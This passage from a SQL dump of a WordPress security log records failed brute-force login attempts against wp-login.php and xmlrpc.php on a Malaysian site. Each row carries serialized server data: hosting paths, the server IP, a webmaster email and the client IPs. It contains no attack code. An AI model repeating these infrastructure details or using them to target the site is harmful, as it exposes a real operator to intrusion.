empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"165.22.168.131\";s:11:\"REMOTE_PORT\";s:5:\"46955\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWU8e7pOXTPHADnstsge8wAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566915707.7798\";s:12:\"REQUEST_TIME\";s:10:\"1566915707\";}}','notice','2019-08-27 14:21:49','2019-08-27 14:21:48',17686400,19177040,'https://bintara.com.my/wp-login.php',1,0,'165.22.168.131'),(23451,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"165.22.168.131\";s:11:\"REMOTE_PORT\";s:5:\"47145\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWU8fs-brxCl71gpwvAJQAAAAEs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566915710.6783\";s:12:\"REQUEST_TIME\";s:10:\"1566915710\";}}','notice','2019-08-27 14:21:51','2019-08-27 14:21:51',18200832,19500128,'https://bintara.com.my/xmlrpc.php',1,0,'165.22.168.131'),(23452,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.189.61\";s:11:\"REMOTE_PORT\";s:5:\"52078\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWU@t7pOXTPHADnstsgfUwAAAAk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566916279.7267\";s:12:\"REQUEST_TIME\";s:10:\"1566916279\";}}','notice','2019-08-27 14:31:21','2019-08-27 14:31:20',17684552,19175792,'https://bintara.com.my/wp-login.php',1,0,'165.22.189.61'),(23453,0,'brute_force','invalid-login::username-test1','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"test1\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.189.61\";s:11:\"REMOTE_PORT\";s:5:\"52550\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWU@urpOXTPHADnstsgfVAAAAAA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566916282.641\";s:12:\"REQUEST_TIME\";s:10:\"1566916282\";}}','notice','2019-08-27 14:31:24','2019-08-27 14:31:23',18200408,19498568,'https://bintara.com.my/xmlrpc.php',1,0,'165.22.189.61'),(23454,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"51.254.214.215\";s:11:\"REMOTE_PORT\";s:5:\"47369\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVBXc-brxCl71gpwvAMLwAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566916957.4854\";s:12:\"REQUEST_TIME\";s:10:\"1566916957\";}}','notice','2019-08-27 14:42:38','2019-08-27 14:42:37',17684400,19173616,'https://bintara.com.my/wp-login.php',1,0,'51.254.214.215'),(23455,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"189.254.17.24\";s:11:\"REMOTE_PORT\";s:5:\"51828\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVDWQ0@TGWC-1tzGX6UeAAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566917465.6558\";s:12:\"REQUEST_TIME\";s:10:\"1566917465\";}}','notice','2019-08-27 14:51:06','2019-08-27 14:51:06',17684176,19176104,'https://bintara.com.my/wp-login.php',1,0,'189.254.17.24'),(23456,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"189.254.17.24\";s:11:\"REMOTE_PORT\";s:5:\"52021\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVDXGXkG1atThADMYG1mQAAAMs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566917468.733\";s:12:\"REQUEST_TIME\";s:10:\"1566917468\";}}','notice','2019-08-27 14:51:10','2019-08-27 14:51:09',18204200,19499808,'https://bintara.com.my/xmlrpc.php',1,0,'189.254.17.24'),(23457,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.79.94\";s:11:\"REMOTE_PORT\";s:5:\"58920\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVH9g0@TGWC-1tzGX6VOwAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566918647.021\";s:12:\"REQUEST_TIME\";s:10:\"1566918647\";}}','notice','2019-08-27 15:10:48','2019-08-27 15:10:47',17690056,19176712,'https://bintara.com.my/wp-login.php',1,0,'139.59.79.94'),(23458,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.79.94\";s:11:\"REMOTE_PORT\";s:5:\"58920\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVH9g0@TGWC-1tzGX6VOwAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566918647.021\";s:12:\"REQUEST_TIME\";s:10:\"1566918647\";}}','notice','2019-08-27 15:10:48','2019-08-27 15:10:47',17851864,19176712,'https://bintara.com.my/wp-login.php',1,0,'139.59.79.94'),(23459,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 